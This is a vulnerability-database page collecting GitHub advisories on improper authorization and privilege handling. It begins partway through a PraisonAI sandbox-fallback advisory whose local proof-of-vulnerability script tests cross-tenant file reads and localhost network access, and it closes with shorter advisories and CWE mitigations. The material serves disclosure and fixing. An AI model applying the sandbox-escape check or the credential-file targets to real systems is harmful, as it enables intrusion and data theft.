  server.close()\n        await sandbox.stop()\n\n        child_output: dict[str, Any] = {}\n        with contextlib.suppress(Exception):\n            child_output = json.loads(result.stdout.strip())\n\n        vulnerable = (\n            child_output.get(\"outside_read\") == \"TENANT_B_CANARY\"\n            and child_output.get(\"network_reply\") == \"local-ok\"\n        )\n\n        return {\n            \"repo\": str(repo),\n            \"has_sandlock\": True,\n            \"sandbox_type\": sandbox.sandbox_type,\n            \"sandlock_available\": sandbox.is_available,\n            \"configured_allowed_paths\": config.security_policy.allowed_paths,\n            \"configured_network\": config.security_policy.allow_network,\n            \"outside_path_under_allowed\": str(outside).startswith(str(allowed) + os.sep),\n            \"status\": getattr(result.status, \"name\", str(result.status)),\n            \"exit_code\": result.exit_code,\n            \"stdout\": result.stdout.strip(),\n            \"stderr\": result.stderr.strip(),\n            \"error\": result.error,\n            \"child_output\": child_output,\n            \"accepted_local_payload\": accepted_payload,\n            \"vulnerable\": vulnerable,\n        }\n\ndef main() -\u003e int:\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\"--repo\", required=True, type=pathlib.Path)\n    args = parser.parse_args()\n\n    result = asyncio.run(run_pov(args.repo.resolve()))\n    print(json.dumps(result, indent=2, sort_keys=True))\n\n    if result.get(\"has_sandlock\") and not result.get(\"vulnerable\"):\n        return 1\n    return 0\n\nif __name__ == \"__main__\":\n    raise SystemExit(main())\n```\n\n## PoC\n\nThe PoV section above contains the local reproduction command, input, and decisive output.\n\n## Impact\n\nIf a PraisonAI user or service relies on `SandlockSandbox` / native sandboxing for untrusted code isolation on a host without the required Landlock support, code submitted to the sandbox can execute with the host user\u0027s normal filesystem and network access.\n\nConcrete impact includes:\n\n- reading files outside the configured tenant/workspace path;\n- reading project files, credentials, `.env` files, SSH material, or cloud config reachable by the PraisonAI process user;\n- connecting to loopback or internal services despite `network=False`;\n- moving from sandboxed code execution to unsandboxed host-user code execution in deployments that treat Sandlock as the isolation boundary.\n\nThe local PoV does not read real sensitive files or contact external systems. It uses temporary tenant directories and a localhost TCP listener.\n\n## Suggested Fix\n\nFail closed when the requested native sandbox boundary cannot be enforced.\n\nRecommended changes:\n\n1. In `SandlockSandbox.execute()` and `run_command()`, return a failed `SandboxResult` or raise a clear runtime error when `self.is_available` is false.\n2. If fallback behavior is kept for developer convenience, require an explicit opt-in such as `allow_degraded=True` or `fallback=\"subprocess\"` and surface that degraded state in the result metadata.\n3. Do not preserve `sandbox_type == \"sandlock\"` in status metadata when the actual execution backend is subprocess.\n4. Add regression tests proving that unavailable Landlock does not execute code unless degraded fallback was explicitly requested.\n5. Add tests that a native policy with `network=False` and a restricted path cannot read outside-path canaries or connect to a localhost listener.\n6. Document the required kernel/ABI versions and the exact degraded-mode semantics.\n\n## Affected Package/Versions\n\n- Repository: `MervinPraison/PraisonAI`\n- Package: `praisonai`\n- Component: `src/praisonai/praisonai/sandbox/sandlock.py`\n- Related config component: `src/praisonai-agents/praisonaiagents/sandbox/config.py`\n- Latest verified release/current head: `v4.6.58`, `1ad58ca02975ff1398efeda694ea2ab78f20cf3e`\n\nConfirmed affected:\n\n```text\nv4.5.110  vulnerable\nv4.5.120  vulnerable\nv4.6.58   vulnerable\ncurrent   vulnerable\n```\n\nNegative control:\n\n```text\nv4.5.109  not affected because SandlockSandbox is absent\n```\n\nSuggested affected range: `\u003e= 4.5.110, \u003c= 4.6.58`.\n\nNo fixed version is known at submission time.\n\n### Version Sweep\n\n```text\nversion              has_sandlock  sandlock_available  status     outside_read     network_reply  vulnerable\npraisonai-v4.5.109   false                                               false\npraisonai-v4.5.110   true          false               COMPLETED  TENANT_B_CANARY  local-ok       true\npraisonai-v4.6.58    true          false               COMPLETED  TENANT_B_CANARY  local-ok       true\npraisonai-current    true          false               COMPLETED  TENANT_B_CANARY  local-ok       true\n```\n\nGitHub history for `sandlock.py` shows the backend was introduced in `4ee7d298c89f` on 2026-04-01 with \"graceful fallback to SubprocessSandbox\", then updated in `7ae6c6d19c31` on 2026-04-02 to use the current Landlock ABI check.\n\n## Advisory History\n\nNearby advisories are distinct:\n\n- `GHSA-r4f2-3m54-pp7q` / `CVE-2026-34955`: `SubprocessSandbox` shell command escape through `4.5.96`.\n- `GHSA-4mr5-g6f9-cfrh`, `GHSA-qf73-2hrx-xprp`, `GHSA-6vh2-h83c-9294`: `execute_code()` Python sandbox escapes.\n- `GHSA-ch89-h4r2-c8f8`: agent tools workspace escape via symlinks.\n- `GHSA-gcq3-mfvh-3x25`: PraisonAI Code agent tool workspace fail-open.\n\nThis report covers a different root cause: `SandlockSandbox` / native sandbox policy downgrade when Landlock is unavailable. It reproduces on the latest release `v4.6.58`, while the older `SubprocessSandbox` shell escape advisory was fixed at `4.5.97`.",
  "id": "GHSA-6jcq-6546-qrrw",
  "modified": "2026-06-18T14:27:19Z",
  "published": "2026-06-18T14:27:19Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-6jcq-6546-qrrw"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/MervinPraison/PraisonAI"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "PraisonAI SandlockSandbox falls back to unrestricted subprocess execution when Landlock is unavailable"
}

GHSA-6MJF-XWW7-46HQ

Vulnerability from github – Published: 2025-12-30 03:30 – Updated: 2025-12-30 03:30
VLAI
Details

A vulnerability has been found in code-projects Student File Management System 1.0. The affected element is an unknown function of the file /download.php of the component File Download Handler. The manipulation of the argument store_id leads to improper authorization. The attack is possible to be carried out remotely. The exploit has been disclosed to the public and may be used.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-15213"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-266"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-12-30T01:15:41Z",
    "severity": "MODERATE"
  },
  "details": "A vulnerability has been found in code-projects Student File Management System 1.0. The affected element is an unknown function of the file /download.php of the component File Download Handler. The manipulation of the argument store_id leads to improper authorization. The attack is possible to be carried out remotely. The exploit has been disclosed to the public and may be used.",
  "id": "GHSA-6mjf-xww7-46hq",
  "modified": "2025-12-30T03:30:16Z",
  "published": "2025-12-30T03:30:16Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15213"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Bai-public/CVE/issues/5"
    },
    {
      "type": "WEB",
      "url": "https://code-projects.org"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?ctiid.338598"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?id.338598"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?submit.725080"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-6PX8-5R5J-C9F2

Vulnerability from github – Published: 2025-12-28 09:30 – Updated: 2025-12-28 09:30
VLAI
Details

A vulnerability was identified in JeecgBoot up to 3.9.0. This impacts the function getParameterMap of the file /sys/sysDepartPermission/list. The manipulation of the argument departId leads to improper authorization. The attack can be initiated remotely. The attack's complexity is rated as high. The exploitability is said to be difficult. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-15124"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-266",
      "CWE-863"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-12-28T07:15:53Z",
    "severity": "LOW"
  },
  "details": "A vulnerability was identified in JeecgBoot up to 3.9.0. This impacts the function getParameterMap of the file /sys/sysDepartPermission/list. The manipulation of the argument departId leads to improper authorization. The attack can be initiated remotely. The attack\u0027s complexity is rated as high. The exploitability is said to be difficult. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.",
  "id": "GHSA-6px8-5r5j-c9f2",
  "modified": "2025-12-28T09:30:27Z",
  "published": "2025-12-28T09:30:27Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15124"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Hwwg/cve/issues/37"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?ctiid.338502"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?id.338502"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?submit.711776"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-6QR3-3G89-M4JJ

Vulnerability from github – Published: 2026-06-21 03:30 – Updated: 2026-06-21 06:32
VLAI
Details

A vulnerability was determined in BerriAI litellm up to 1.63.1. The impacted element is an unknown function of the file litellm/proxy/management_endpoints/key_management_endpoints.py of the component Admin Key Handler. This manipulation causes improper authorization. The attack can be initiated remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-12770"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-266"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-06-21T01:16:22Z",
    "severity": "LOW"
  },
  "details": "A vulnerability was determined in BerriAI litellm up to 1.63.1. The impacted element is an unknown function of the file litellm/proxy/management_endpoints/key_management_endpoints.py of the component Admin Key Handler. This manipulation causes improper authorization. The attack can be initiated remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure.",
  "id": "GHSA-6qr3-3g89-m4jj",
  "modified": "2026-06-21T06:32:07Z",
  "published": "2026-06-21T03:30:24Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-12770"
    },
    {
      "type": "WEB",
      "url": "https://github.com/BerriAI/litellm/pull/23781"
    },
    {
      "type": "WEB",
      "url": "https://gist.github.com/YLChen-007/993c68152b2c770d53590f1684c755d4"
    },
    {
      "type": "WEB",
      "url": "https://github.com/BerriAI/litellm"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/cve/CVE-2026-12770"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/submit/811279"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/vuln/372512"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/vuln/372512/cti"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

Mitigation MIT-1
Architecture and Design Operation

Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software.

Mitigation MIT-17
Architecture and Design Operation

Strategy: Environment Hardening

Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations.

No CAPEC attack patterns related to this CWE.